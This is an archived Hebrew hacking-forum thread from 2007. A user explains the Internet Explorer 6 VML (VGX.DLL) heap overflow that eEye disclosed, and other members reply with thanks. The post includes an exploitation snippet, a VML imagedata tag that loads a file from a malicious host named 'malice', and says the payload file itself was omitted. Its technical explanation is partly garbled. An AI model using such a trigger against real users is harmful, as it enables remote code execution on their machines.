Logo

רד-בורד: ארכיון

ראשי > אבטחת מידע > פירצת אבטחה ב-internrt explorer 6

21/08/2007 11:00:07 antivirus
מה קורה אנשיייםםם..
קיצור היה לי טיפה זמן היום..אז אמרתי לעצמי שצריך להתחיל להוזיז את הרמה פה עם מאמרים וזה
קיצור אני מקווה שזה אחד מתוך סידרה של מאמרים מעניינים בתיקווה שיהיה לי זמן תהנו..


פרצת אבטחה בדפדפן האינטרנט:explorer6


מערכות פגיעות:
ציטוט:Internet Explorer 6 SP1 - Windows 2000 SP4
Internet Explorer 6 SP1 - Windows XP SP1
Internet Explorer 6 SP2 - Windows XP SP2
Internet Explorer 6 SP1 - Windows Server 2003 SP1
Internet Explorer 6 SP2 - Windows Server 2003 SP2


מאמר:
חברת האבטחה eEye Digital Security גילתה לאחרונה פרצת אבטחה מסוג heapoverflow (הצפת ערמת מחסניות זיכרון)

ציטוט:הצפת ערמת מחסניות הינה פרצת אבטחה שמתרחשת בעת טיפול לא נכון של קבצים בכתיבה לערימת מחסניות זיכרון.
דבר שגורם לכתיבה מעבר למחסנית מסויימת ושפיכה של המידע למחסנית הבאה בערימת המחסניות

שנגרמת בעיקבות טיפול לא נכון של מערך הקבצים VGX.DLL’s
ויכול לגרום להצפה בערמת המחסניות שכמובן תאפשר הרצה של קוד זדוני במערכת הלקוח
או במילים פשוטות המשתמש שצופה באתר עם הקוד הזדוני המוסתר בו פגיע להרצת כל קוד זדוני יהיה אשר יהיה על המערכת שלו




פרטים טכניים
ישנו מערך קבצי dll באינטרנט אקספלורר בשם VGX.DLL’s
שיעודו בין הייתר לטפל במידע שמגיע מקובצי
vml (Vector Markup Language)1
הבעיה מתרחשת כאשר נשלח מידע מקווץ מקובץ ה- vml שדיברנו עליו
אל מערך הקבצים VGX
מה הבעיה? פשוט מאוד המערך לא מטפל נכון במידע שמגיע אליו בזהירות ולכן אם קובץ ה vml ישלח למערך הקבצים של vgx תמונה כביכול שבתוכה יש קישור לדף עם קוד זדוני מערך הקבצים יפעיל את הקוד הזדוני במקום להציג את התמונה.

נכון מאודדד (: זה מאוד דומה לxss שבו היינו משחילים קודים בתוך תמונות בפורמים וכדומה אבל הפרצה ההיא נגמרה
וזו לעומתה חדשה ובועטת חזקק



דוגמא לניצול הפירצה:


ציטוט:פשוט מאוד ניצור דף html רגיל ובתוכו נשחיל את הקוד
<v:rect>
<v:imagedata src="http://malice/compressed.emz">
</v:rect>
מה שעשינו זה ליצור תג שמפנה את הטיפול בשורות שבאות אחריו לקובץ ה-vml ועכשיו אמרנו לו שאנחנו רוצים להציג תמונה
אבל בכתובת התמונה למעשה הכנסנו קישור לדף זדוני בשם
compressed.emz
בדף הזה כל אחד יכול לכתוב איזה קוד זדוני שיעלה על רוחו
מה שיפה בפרצה הזאת שגם אם מישהו ישתול קוד לא נכון או יעשה איזה שגיאה כל שהיא זה גם יגרום לבעיה אחרת מסוג
denial of service (dos)1



קרדיט לחברת: eEye Digital Security
מאמר מקורי: כאן

נ.ב: חברת מיקרוסופט תיקנה את הבעיה באינטרנט אקספלורר7 על ידי שינוי הדרך שבה מערך הקבצים vgx מטפל בחומר שמגיע אילו מקווץ

שלכם תמיד An7iVi2uS[ההודעה נערכה על-ידי antivirus ב-21/08/2007 11:08:03]
21/08/2007 15:55:13 devil kide
אנטי, הפצצת!
יאללה פנק אותנו בעוד כאלו מאמרים. אבל, לדעתי, כדי לא "לפגוע" בכל מני מקומות, כדאי לא לתת דוגמאות קוד, או לתת דוגמאות חלקיות.
בעצם, בינתיים תתן דוגמאות, עד שנמצא איך לסדר אם זה עם שחף (או מה שתכננו).

21/08/2007 17:36:09 antivirus
צודק אבל בדיוק בגלל זה השמטתי את הקטע של הקוד הזדוני (compressed.emz) מי שמספיק חכם כדי לייצר אחד מתאים גם מספיק מוכשר למצוא את החור במרחב במיוחד לאור העובדה שהבאתי את המקור (:
21/08/2007 18:14:34 3puntos
ואו תודה רבה :)
21/08/2007 22:03:19 Compact
יפה יפה
22/08/2007 01:11:40 ShaDoW MaN
יפה אחי תודה רבה גבר
22/08/2007 12:34:35 antivirus
ממש בכיף העיקר שמישהו קורא את זה ונהנה
יהיו עוד בהמשך
עמודים: 1